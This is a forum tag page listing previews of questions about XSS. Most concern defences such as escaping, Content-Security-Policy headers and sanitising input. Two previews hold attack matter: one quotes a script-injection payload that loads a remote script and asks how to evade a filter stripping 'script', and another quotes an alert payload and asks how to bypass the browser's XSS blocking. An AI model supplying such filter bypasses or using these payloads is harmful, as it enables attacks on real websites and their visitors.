Questions tagged [XSS] (60)

3
answers

How to replace the script?

Previously I used "><script scr=http://site.com/script.js></script>, but now the website has added a filter and removes "script" from the website address. How can I replace "script" so that the XSS would still work?
Rosendo_Legr asked April 4th 20 at 13:39
0
answer

How to install the script XSSer in PentestBox?

Hi all. I'm not very good at Python, so please tell me what I'm doing wrong. Error: Traceback (most recent call last): File "C:\PentestBox\bin\customtools\webApplications\xsser\xsser\setup.py", line 32, in <module> for afile in os.listdir('doc'): WindowsError: [Error 3] : 'doc/*.*' The file itself is here h...
Elvie asked March 24th 20 at 13:16
0
answer

What escaping does request.form.to_dict() apply?

Hello! There is a piece of code where data is taken from forms and inserted into a database. At this stage some adaptation of the HTML tags takes place. I would like to know in what form such strings should be stored in the database. cv_firstname = request.form.get('firstname') cv_lastname = request.form.get('lastname') cv_email ...
lisa asked March 19th 20 at 09:25
2
answers

How do I know whether my WordPress site contains XSS vulnerabilities?

I'm a noob. I received a warning from the hosting company that in these files: /home/мойсайт/public_html/wp-includes/formatting.php /home/мойсайт/public_html/wp-includes/comment.php /home/мойсайт/public_html/wp-admin/includes/ajax-actions.php ...an XSS vulnerability was discovered. Current WP version is 4.8.8. The panel proposes to update WP t...
Aisha.Schaefer54 asked March 18th 20 at 21:57
1
answer

Protection against XSS through escaping?

There is a website in PHP. How best to protect it from XSS? If, for example, when adding data to the database, I escape the special characters (mostly <, >, $, %, &, ' and ") with htmlspecialchars, will that help avoid XSS?
paxton_Ledner39 asked March 16th 20 at 13:23
1
answer

SQL and XSS: do I understand correctly?

1) Insert information into the database using PDO: prepare the query, bind the variables with a type and execute, so that the input data cannot alter the query. If the id, let's say of an article, is passed via a GET request, you need to cast it to an integer: $sth->bindValue(1, (int) $id, PDO::PARAM_INT); If the input, for example, th...
jennyfer_Barton asked March 15th 20 at 22:59
2
answers

How to determine whether a string contains XSS or not?

Hello. How do I know whether a string is dangerous or not? I tried processing a string with HTMLPurifier and then comparing its length with the raw string. If the length differs, then HTMLPurifier removed dangerous elements from the string (tags, attributes), so the string was dangerous. But it doesn't work, because HTMLPurifier built ...
ora_Romague asked March 13th 20 at 11:03
2
answers

The browser blocks following a link containing the XSS. How to bypass the block?

Hi all. I recently found a website vulnerable to XSS. I'm not an expert, but my brain was enough for "/><""/><script>alert("admin, remove xss!")script>... So. I entered it in the site's search field, and it works. Of course, I reported it to support, although something tells me they don't even read it.... Because th...
avis_Co asked March 12th 20 at 16:41
1
answer

Will 2 Content-Security-Policy headers work correctly?

I have an app that does server-side rendering. In addition, it is proxied through nginx. I configured the CSP in nginx, but the problem is that the app (or rather the framework) injects its own scripts into the layout, so I need to use a hash, which only the app can provide. I set the CSP header in the application (regarding the scri...
lupe.Hilll asked March 11th 20 at 23:18
3
answers

Is it safe to insert JSON into HTML?

Is it safe to insert JSON strings received from the user directly into the page via a script tag? Is it possible, through special HTML sequences, to break out of the JSON and produce an XSS? The JSON is generated by the PHP function json_encode. Example: $queryData = json_encode(array('query' => isset($_GET['query']) ? $_GET['query'] : ",...
Tyshawn11 asked October 10th 19 at 06:15